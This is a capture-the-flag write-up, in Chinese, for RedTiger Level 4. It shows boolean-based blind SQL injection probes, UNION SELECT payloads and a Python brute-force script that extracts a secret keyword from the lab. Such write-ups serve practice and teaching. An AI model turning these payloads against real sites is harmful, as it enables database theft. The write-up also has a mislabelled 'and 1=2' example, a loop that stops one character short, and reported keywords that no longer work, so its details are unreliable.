Level 4

References

Writeup

  • SQLi判斷:Boolean Based Blind SQL Injection
    • and 1=1:
      http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=1
Query returned 1 rows.
    • and 1=2:
      http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=1
Query returned 0 rows.
  • 盲注長度判斷:
    • length(keyword)>20成立:
      union select keyword, 1 
from level4_secret 
where length(keyword)>20

      Query returned 2 rows.
    • length(keyword)>25不成立:
      union select keyword, 1 
from level4_secret 
where length(keyword)>25

      Query returned 1 rows.
    • 最後發現長度為21
      union select keyword, 1 
from level4_secret 
where length(keyword)=21

      Query returned 2 rows.
  • 字元判斷: (a~z, 0~9)
    union select keyword, 1
from level4_secret 
where ascii(substring(keyword,1,1))= 97

    union select keyword, 1
from level4_secret 
where ascii(substring(keyword,1,1))= 98
    ...
    union select keyword, 1
from level4_secret 
where ascii(substring(keyword,21,1))= 57

  • script:

    #!/usr/bin/env python
# encoding: utf-8

import requests
s = requests.session()

str='abcdefghijklmnopqrstuvwxyz0123456789'
headers = {'Cookie': 'level4login=there_is_no_bug'}
result = ''

for x in range(1, 21):
    for i in str:
        url="http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword, 1 from level4_secret where ascii(substring(keyword,%i,1))= %i" % (x, ord(i))
        r = s.get(url, headers=headers)
        if "2 rows" in r.content:
            print i
            result += i
            break

print result
  • 最後keyword為killstickswithbr1cks
  • 但這組keyword網站上無法過關,而且跑出來的結果與其它writeup不同(blindinjection123)也無法過關,感覺keyword有變過,第五關通關密碼也變了,無法使用bananas_are_not_yellow-sometimes登入

results matching ""

    No results matching ""